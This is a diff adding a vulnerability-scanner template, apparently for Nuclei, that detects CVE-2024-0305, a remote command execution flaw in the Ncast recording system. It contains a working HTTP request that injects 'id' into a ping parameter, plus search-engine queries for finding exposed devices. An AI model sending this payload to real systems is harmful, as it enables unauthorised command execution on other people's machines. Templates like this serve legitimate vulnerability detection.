Added CVE-2024-0305

http/cves/2024/CVE-2024-0305.yaml

@@ -0,0 +1,42 @@
+id: CVE-2024-0305
+
+info:
+  name: Ncast busiFacade - Remote Command Execution
+  author: BMCel
+  severity: critical
+  description: |
+    The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.
+  impact: |
+    Allows remote attackers to execute arbitrary code on the affected system.
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-0305
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-0305
+    - https://cxsecurity.com/cveshow/CVE-2024-0305
+  metadata:
+    max-request: 1
+    zoomeye-query: title:"高清智能录播系统"
+    fofa-query: app="Ncast-产品" && title=="高清智能录播系统"
+  tags: cve2024,cve,ncast,rce
+
+http:
+  - raw:
+      - |
+        POST /classes/common/busiFacade.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        X-Requested-With: XMLHttpRequest
+
+        {"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | id"]}
+
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'uid='
+          - 'gid='
+
+      - type: status
+        status:
+          - 200